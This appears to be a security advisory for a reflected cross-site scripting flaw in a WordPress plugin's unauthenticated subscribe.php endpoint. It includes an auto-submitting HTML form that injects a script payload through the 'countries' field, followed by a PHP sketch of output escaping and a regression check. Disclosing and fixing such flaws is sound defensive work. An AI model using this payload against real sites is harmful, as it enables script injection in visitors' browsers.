Description

The plugin does not sanitise and escape the parameters before outputting them back in the response of an unauthenticated request, leading to Reflected Cross-Site Scripting.
Open an HTML file containing the following:
```
<html>
<body>
<form action="https://example.com/wp-content/plugins/wpb-show-core/auto-suggest-categories/subscribe.php" id="hack" method="POST">
<input type="hidden" name="firstname" value="test" />
<input type="hidden" name="lastname" value="test2" />
<input type="hidden" name="countries" value='xxxxxx"><script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
```
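The fix for this class of bug is to escape at output time. The sketch below is an added example, not the plugin's code (its source is not shown on this page). The function names are hypothetical, and it assumes the `countries` value is reflected into a double-quoted HTML attribute, as the `">` prefix of the payload suggests.

```php
<?php
// Added illustration; NOT the plugin's source. Function names are hypothetical.
// Assumption: the handler reflects the POSTed "countries" value into a
// double-quoted HTML attribute.

// Unsafe pattern: request data concatenated into markup as-is.
// A double quote in the value closes the attribute, and whatever
// follows is parsed by the browser as markup.
function render_unescaped(string $countries): string
{
    return '<input type="text" name="countries" value="' . $countries . '">';
}

// Hardened pattern: escape for the attribute context when writing output.
// Inside WordPress, esc_attr() is the idiomatic call; htmlspecialchars()
// is used here so the script runs without WordPress loaded.
function render_escaped(string $countries): string
{
    $safe = htmlspecialchars($countries, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="countries" value="' . $safe . '">';
}

// Constructed input: the "countries" value from the form above.
$payload = 'xxxxxx"><script>alert(/XSS/)</script>';

// Regression check a maintainer can keep next to the fix: a reflected
// value must never add a tag to the response.
foreach (['unescaped' => render_unescaped($payload),
          'escaped'   => render_escaped($payload)] as $label => $html) {
    $injected = stripos($html, '<script') !== false;
    echo $label, ': ', $injected ? 'new tag in output' : 'value stayed attribute text', PHP_EOL;
    echo '  ', $html, PHP_EOL;
}
```

Escaping on output is what closes the hole; sanitising the field on input as well (for example with WordPress's `sanitize_text_field()`) is useful defence in depth but does not replace it.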